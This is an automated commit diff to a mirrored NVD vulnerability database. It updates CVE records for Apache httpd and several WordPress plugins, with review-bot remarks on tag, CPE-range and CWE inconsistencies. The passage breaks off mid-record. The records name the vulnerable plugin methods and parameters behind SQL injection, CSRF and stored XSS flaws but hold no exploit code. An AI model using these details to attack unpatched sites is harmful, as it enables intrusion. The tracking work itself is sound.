Auto-Update: 2024-01-19T17:00:25.391679+00:00

cad-safe-bot 2024-01-19 17:00:29 +00:00
parent 4010ee4aa1
commit 13b8c98c4d
83 changed files with 3887 additions and 807 deletions


@ -2,7 +2,7 @@
"id": "CVE-2007-4465",
"sourceIdentifier": "cve@mitre.org",
"published": "2007-09-14T00:17:00.000",
"lastModified": "2023-12-22T19:36:14.493",
"lastModified": "2024-01-19T15:13:13.213",
"vulnStatus": "Analyzed",
"descriptions": [
{
@ -330,7 +330,9 @@
"url": "http://www.securityfocus.com/archive/1/479237/100/0/threaded",
"source": "cve@mitre.org",
"tags": [
"Broken Link"
"Broken Link",
"Third Party Advisory",
"VDB Entry"
]
},
{
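Review bot: The securityfocus.com reference in the second hunk now appears to carry `"Broken Link"` together with `"Third Party Advisory"` and `"VDB Entry"`, so a consumer cannot tell from `tags` whether the URL is still usable as an advisory. The same host's `/archive/1/...` links in the CVE-2008-2939 section of this commit get only the two content tags, so the tagging is inconsistent across records. Tooling that reads `tags` should let `"Broken Link"` override the other values when deciding whether to fetch or cite the URL. The surrounding references array continues outside the hunk.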


@ -2,8 +2,8 @@
"id": "CVE-2008-2939",
"sourceIdentifier": "secalert@redhat.com",
"published": "2008-08-06T18:41:00.000",
"lastModified": "2023-02-13T02:19:16.490",
"vulnStatus": "Modified",
"lastModified": "2024-01-19T15:13:54.737",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -75,48 +75,10 @@
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D623D8C0-65D2-4269-A1D4-5CB3899F44C8"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "67AD11FB-529C-404E-A13B-284F145322B8"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "733D62FE-180A-4AE8-9DBF-DA1DC18C1932"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "CCBBB7FE-35FC-4515-8393-5145339FCE4D"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "F519633F-AB68-495A-B85E-FD41F9F752CA"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.4:*:*:*:*:*:*:*",
"matchCriteriaId": "A894BED6-C97D-4DA4-A13D-9CB2B3306BC5"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.6:*:*:*:*:*:*:*",
"matchCriteriaId": "34A847D1-5AD5-4EFD-B165-7602AFC1E656"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.8:*:*:*:*:*:*:*",
"matchCriteriaId": "9AF3A0F5-4E5C-4278-9927-1F94F25CCAFC"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.2.9:*:*:*:*:*:*:*",
"matchCriteriaId": "AB63EBE5-CF14-491E-ABA5-67116DFE3E5B"
"criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*",
"versionStartIncluding": "2.2.0",
"versionEndIncluding": "2.2.9",
"matchCriteriaId": "AAAFBA9B-793F-4B2A-89F5-2656C1278563"
}
]
}
@ -172,225 +134,445 @@
"references": [
{
"url": "http://lists.apple.com/archives/security-announce/2009/May/msg00002.html",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Mailing List"
]
},
{
"url": "http://lists.opensuse.org/opensuse-security-announce/2008-11/msg00000.html",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://marc.info/?l=bugtraq&m=123376588623823&w=2",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://marc.info/?l=bugtraq&m=125631037611762&w=2",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://rhn.redhat.com/errata/RHSA-2008-0967.html",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://secunia.com/advisories/31384",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/31673",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/32685",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/32838",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/33156",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/33797",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/34219",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://secunia.com/advisories/35074",
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-247666-1",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://support.apple.com/kb/HT3549",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://svn.apache.org/viewvc?view=rev&revision=682868",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://svn.apache.org/viewvc?view=rev&revision=682870",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://svn.apache.org/viewvc?view=rev&revision=682871",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://wiki.rpath.com/Advisories:rPSA-2008-0327",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0328",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www-1.ibm.com/support/docview.wss?uid=swg1PK70197",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://www-1.ibm.com/support/docview.wss?uid=swg1PK70937",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://www.kb.cert.org/vuls/id/663763",
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"US Government Resource"
]
},
{
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2008:194",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2008:195",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:124",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.rapid7.com/advisories/R7-0033",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.redhat.com/support/errata/RHSA-2008-0966.html",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://www.securityfocus.com/archive/1/495180/100/0/threaded",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.securityfocus.com/archive/1/498566/100/0/threaded",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.securityfocus.com/archive/1/498567/100/0/threaded",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.securityfocus.com/bid/30560",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.securitytracker.com/id?1020635",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.ubuntu.com/usn/USN-731-1",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.us-cert.gov/cas/techalerts/TA09-133A.html",
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory",
"US Government Resource"
]
},
{
"url": "http://www.vupen.com/english/advisories/2008/2315",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Permissions Required"
]
},
{
"url": "http://www.vupen.com/english/advisories/2008/2461",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Permissions Required"
]
},
{
"url": "http://www.vupen.com/english/advisories/2009/0320",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Permissions Required"
]
},
{
"url": "http://www.vupen.com/english/advisories/2009/1297",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Permissions Required"
]
},
{
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44223",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"VDB Entry"
]
},
{
"url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r7dd6be4dc38148704f2edafb44a8712abaa3a2be120d6c3314d55919%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r84d043c2115176958562133d96d851495d712aa49da155d81f6733be%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rc4c53a0d57b2771ecd4b965010580db355e38137c8711311ee1073a8%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3Ccvs.httpd.apache.org%3E",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
]
},
{
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11316",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
},
{
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7716",
"source": "secalert@redhat.com"
"source": "secalert@redhat.com",
"tags": [
"Broken Link"
]
}
]
}
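Review bot: The cpeMatch hunk (`@ -75,48 +75,10 @`) appears to replace the enumerated Apache httpd entries with one range, `"versionStartIncluding": "2.2.0"` to `"versionEndIncluding": "2.2.9"`, and that is not an equivalent match set. The enumerated list had no 2.2.5 or 2.2.7 entry, which the range now covers, and it had a `cpe:2.3:a:apache:http_server:-:...` entry that the range does not match. Scanners that matched this CVE against an httpd inventory record with no version will stop matching after this update, so those assets need a version recorded or a separate check. In the references hunk, `http://www.ubuntu.com/usn/USN-731-1` is tagged `"VDB Entry"` although it is a distributor advisory, and the `svn.apache.org` revision links are tagged `"Third Party Advisory"` rather than `"Patch"`, so tag-based filters for fixes will miss them.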


@ -2,19 +2,80 @@
"id": "CVE-2021-24567",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.050",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:26:00.567",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The Simple Post WordPress plugin through 1.1 does not sanitize user input when an authenticated user Text value, then it does not escape these values when outputting to the browser leading to an Authenticated Stored XSS Cross-Site Scripting issue."
},
{
"lang": "es",
"value": "El complemento Simple Post WordPress hasta la versi\u00f3n 1.1 no sanitiza la entrada del usuario cuando un valor de texto de usuario autenticado, luego no escapa de estos valores cuando se env\u00eda al navegador, lo que genera un problema de cross site scripting (XSS) almacenado autenticado."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:nickmomrik:simple_post:*:*:*:*:*:wordpress:*:*",
"versionEndIncluding": "1.1",
"matchCriteriaId": "303EC6DD-DD3A-4E54-AF9F-586A11905F54"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/a3cd3115-2181-4e14-8b39-4de096433847/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}


@ -2,23 +2,87 @@
"id": "CVE-2021-24869",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.103",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:25:42.380",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The WP Fastest Cache WordPress plugin before 0.9.5 does not escape user input in the set_urls_with_terms method before using it in a SQL statement, leading to an SQL injection exploitable by low privilege users such as subscriber"
},
{
"lang": "es",
"value": "El complemento de WordPress WP Fastest Cache anterior a 0.9.5 no escapa a la entrada del usuario en el m\u00e9todo set_urls_with_terms antes de usarlo en una declaraci\u00f3n SQL, lo que lleva a una inyecci\u00f3n de SQL explotable por usuarios con pocos privilegios, como un suscriptor."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-89"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "0.9.5",
"matchCriteriaId": "C5057D35-B8BB-4AC3-ADCD-F89EA6099A95"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://jetpack.com/2021/10/14/multiple-vulnerabilities-in-wp-fastest-cache-plugin/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://wpscan.com/vulnerability/b2233795-1a32-45fc-9d51-b6bd0a073f5b/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Third Party Advisory"
]
}
]
}


@ -2,23 +2,87 @@
"id": "CVE-2021-24870",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.153",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:25:10.717",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The WP Fastest Cache WordPress plugin before 0.9.5 is lacking a CSRF check in its wpfc_save_cdn_integration AJAX action, and does not sanitise and escape some the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload"
},
{
"lang": "es",
"value": "El complemento de WordPress WP Fastest Cache anterior a 0.9.5 carece de una verificaci\u00f3n CSRF en su acci\u00f3n AJAX wpfc_save_cdn_integration, y no sanitiza ni escapa algunas de las opciones disponibles a trav\u00e9s de la acci\u00f3n, lo que podr\u00eda permitir a los atacantes hacer que los usuarios registrados con altos privilegios lo llamen y configuren un payload de cross site scripting"
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-352"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "0.9.5",
"matchCriteriaId": "C5057D35-B8BB-4AC3-ADCD-F89EA6099A95"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://jetpack.com/2021/10/14/multiple-vulnerabilities-in-wp-fastest-cache-plugin/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "https://wpscan.com/vulnerability/48de63ab-2ef1-4469-8fc4-9346068bdf06/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Third Party Advisory"
]
}
]
}


@ -2,19 +2,80 @@
"id": "CVE-2021-25117",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.213",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:24:25.360",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The WP-PostRatings WordPress plugin before 1.86.1 does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled."
},
{
"lang": "es",
"value": "El complemento de WordPress WP-PostRatings anterior a 1.86.1 no sanitiza el par\u00e1metro postratings_image de su p\u00e1gina de opciones (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Aunque solo los administradores pueden acceder a la p\u00e1gina y est\u00e1 protegida contra ataques CSRF, el problema a\u00fan se puede explotar cuando la capacidad unfiltered_html est\u00e1 deshabilitada."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-352"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:lesterchan:wp-postratings:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "1.86.1",
"matchCriteriaId": "28B896C6-D8D0-4B5D-8B36-244EBDF8FEA9"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/d2d9a789-edae-4ae1-92af-e6132db7efcd/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}
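Review bot: The added `weaknesses` entry assigns `"value": "CWE-352"`, but the English description in the same record says the options page is "protected against CSRF attacks" and describes an unsanitised `postratings_image` parameter that matters when `unfiltered_html` is disabled. That reads as a stored cross-site scripting issue, and the added vector (`PR:H/UI:R/S:C/C:L/I:L`) is consistent with that, so `"value": "CWE-79"` looks like the intended classification. Since this is mirrored data, the correction belongs upstream. Until then, dashboards or rules that bucket records by CWE should not rely on this field for CVE-2021-25117.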


@ -2,19 +2,80 @@
"id": "CVE-2021-4227",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-16T16:15:09.270",
"lastModified": "2024-01-16T23:12:38.473",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-19T15:29:25.803",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section"
},
{
"lang": "es",
"value": "El complemento de WordPress ark-commenteditor hasta la versi\u00f3n 2.15.6 no sanitiza ni codifica adecuadamente los comentarios cuando est\u00e1 en el editor de c\u00f3digo fuente, lo que permite a los atacantes inyectar un iFrame en la p\u00e1gina y, por lo tanto, cargar contenido arbitrario desde cualquier p\u00e1gina a la secci\u00f3n de comentarios."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-74"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:obg:ark_wysiwyg_comment_editor:*:*:*:*:*:wordpress:*:*",
"versionEndIncluding": "2.15.6",
"matchCriteriaId": "0D7DDA5E-7004-48F6-A6E7-4D283878B1DE"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/8d015eba-31dc-44cb-a051-4e95df782b75/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}


@ -2,8 +2,8 @@
"id": "CVE-2022-23633",
"sourceIdentifier": "security-advisories@github.com",
"published": "2022-02-11T21:15:11.990",
"lastModified": "2023-07-11T20:41:55.303",
"vulnStatus": "Analyzed",
"lastModified": "2024-01-19T16:15:08.417",
"vulnStatus": "Modified",
"descriptions": [
{
"lang": "en",
@ -200,6 +200,10 @@
"Third Party Advisory"
]
},
{
"url": "https://security.netapp.com/advisory/ntap-20240119-0013/",
"source": "security-advisories@github.com"
},
{
"url": "https://www.debian.org/security/2023/dsa-5372",
"source": "security-advisories@github.com",
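Review bot: The reference added in the second hunk, `https://security.netapp.com/advisory/ntap-20240119-0013/`, has no `tags` array, while the neighbouring references carry one, and `vulnStatus` appears to move from `"Analyzed"` to `"Modified"`. The same applies to the `packetstormsecurity.com` reference added in the CVE-2022-42889 section of this commit. Consumers that prioritise on tag values such as `"Exploit"` or `"Patch"` should treat a missing `tags` key as unclassified, not as absence of that category. These records should be re-read after the upstream re-analysis. The references array continues outside the hunk.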


@ -0,0 +1,111 @@
{
"id": "CVE-2022-40700",
"sourceIdentifier": "audit@patchstack.com",
"published": "2024-01-19T15:15:08.020",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"descriptions": [
{
"lang": "en",
